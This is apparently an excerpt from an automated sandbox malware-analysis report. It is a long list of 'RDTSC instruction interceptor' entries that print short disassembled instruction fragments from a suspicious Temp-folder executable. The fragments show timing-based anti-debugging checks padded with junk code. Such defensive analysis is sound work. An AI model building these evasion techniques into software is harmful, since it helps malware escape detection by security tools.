                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D298 second address: 52D307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0392h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f ja 00007F4C288D0386h 0x00000015 pop edi 0x00000016 push esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop esi 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F4C288D0388h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 sub dword ptr [ebp+122D316Ch], eax 0x0000003c push 00000000h 0x0000003e mov bx, ax 0x00000041 movzx edi, ax 0x00000044 push 00000000h 0x00000046 mov ebx, dword ptr [ebp+122D2B00h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F4C288D038Dh 0x00000054 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E33B second address: 52E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E33F second address: 52E357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52F323 second address: 52F36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4C28D8B356h 0x00000009 jne 00007F4C28D8B356h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F4C28D8B35Ah 0x0000001a push 00000000h 0x0000001c mov edi, ecx 0x0000001e mov bx, 4300h 0x00000022 push 00000000h 0x00000024 cld 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jng 00007F4C28D8B35Ch 0x0000002d jns 00007F4C28D8B356h 0x00000033 push esi 0x00000034 jnp 00007F4C28D8B356h 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 530246 second address: 53024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53024C second address: 530259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4C28D8B356h 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 530259 second address: 53025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5322D3 second address: 5322D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343AD second address: 5343B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343B1 second address: 5343B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343B5 second address: 5343C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jc 00007F4C288D0388h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343C9 second address: 5343CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 536410 second address: 536414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 537348 second address: 5373D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F4C28D8B356h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F4C28D8B358h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2319h], ebx 0x0000002f push 00000000h 0x00000031 mov bx, di 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F4C28D8B358h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 pushad 0x00000051 adc di, 4582h 0x00000056 mov esi, 6185CEFBh 0x0000005b popad 0x0000005c or edi, dword ptr [ebp+122D1830h] 0x00000062 xchg eax, esi 0x00000063 jp 00007F4C28D8B35Eh 0x00000069 push eax 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jo 00007F4C28D8B356h 0x00000073 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 539286 second address: 53928A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53928A second address: 5392AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53F71D second address: 53F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F4C288D0386h 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f jo 00007F4C288D038Eh 0x00000015 jnp 00007F4C288D0386h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007F4C288D038Dh 0x00000023 push eax 0x00000024 pop eax 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4C288D0394h 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54110F second address: 541118 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 541118 second address: 54111E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 548428 second address: 548445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B364h 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 548445 second address: 548454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E001 second address: 54E006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E006 second address: 54E00B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E00B second address: 54E01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a jc 00007F4C28D8B35Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E0F7 second address: 54E12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4C288D0386h 0x0000000a popad 0x0000000b push edi 0x0000000c jne 00007F4C288D0386h 0x00000012 pop edi 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jp 00007F4C288D0388h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4C288D0397h 0x00000026 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E12F second address: 54E133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E133 second address: 54E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F4C288D0392h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4C288D0399h 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E2F3 second address: 54E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E2F7 second address: 54E30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D4C5 second address: 52D4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F4C28D8B356h 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E646 second address: 52E64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E64C second address: 52E65A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E65A second address: 52E65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53047B second address: 5304B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4C28D8B366h 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 532525 second address: 53252F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4C288D0386h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5365F9 second address: 536607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4C28D8B356h 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53841C second address: 538420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 539586 second address: 53958A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C4AE second address: 53C4DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D038Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C288D0399h 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53B4E9 second address: 53B598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 jng 00007F4C28D8B372h 0x0000000f jbe 00007F4C28D8B36Ch 0x00000015 jmp 00007F4C28D8B366h 0x0000001a nop 0x0000001b clc 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D31C5h], edx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov edi, dword ptr [ebp+122D2960h] 0x00000036 mov bl, 8Ch 0x00000038 mov eax, dword ptr [ebp+122D0C15h] 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F4C28D8B358h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov edi, 24F4C65Ah 0x0000005d push FFFFFFFFh 0x0000005f call 00007F4C28D8B35Dh 0x00000064 mov bx, si 0x00000067 pop ebx 0x00000068 nop 0x00000069 jmp 00007F4C28D8B364h 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F4C28D8B35Dh 0x00000076 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 538420 second address: 53844F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4C288D038Dh 0x00000010 jmp 00007F4C288D0396h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53B598 second address: 53B59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C5C4 second address: 53C5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53C5C8 second address: 53C5CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5334C5 second address: 5334C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5334C9 second address: 5334CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5335AD second address: 5335CA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e je 00007F4C288D0386h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F4C288D0386h 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5335CA second address: 5335CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552C92 second address: 552CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4C288D0394h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552CAC second address: 552CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552CB6 second address: 552CE7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D0386h 0x00000008 jmp 00007F4C288D0398h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C288D038Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 552CE7 second address: 552CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5532A7 second address: 5532AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5533FD second address: 55341F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B362h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F4C28D8B356h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55341F second address: 553423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553585 second address: 55358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55358D second address: 5535A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F4C288D0390h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5538A9 second address: 5538DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C28D8B371h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007F4C28D8B358h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5538DC second address: 5538E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5538E2 second address: 553905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C28D8B369h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553905 second address: 55390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553EB5 second address: 553EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F4C28D8B35Ch 0x0000000d pushad 0x0000000e jmp 00007F4C28D8B35Dh 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 553EDA second address: 553EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 557367 second address: 55736D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55736D second address: 557376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 557376 second address: 557391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B360h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 557391 second address: 557395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55A1F1 second address: 55A20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B367h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55A20D second address: 55A218 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F4C288D0386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55FE88 second address: 55FE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4C28D8B356h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4DBDAE second address: 4DBDC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 jbe 00007F4C288D038Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55E9F9 second address: 55EA06 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C28D8B358h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55EA06 second address: 55EA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55EA14 second address: 55EA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55EF94 second address: 55EF9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
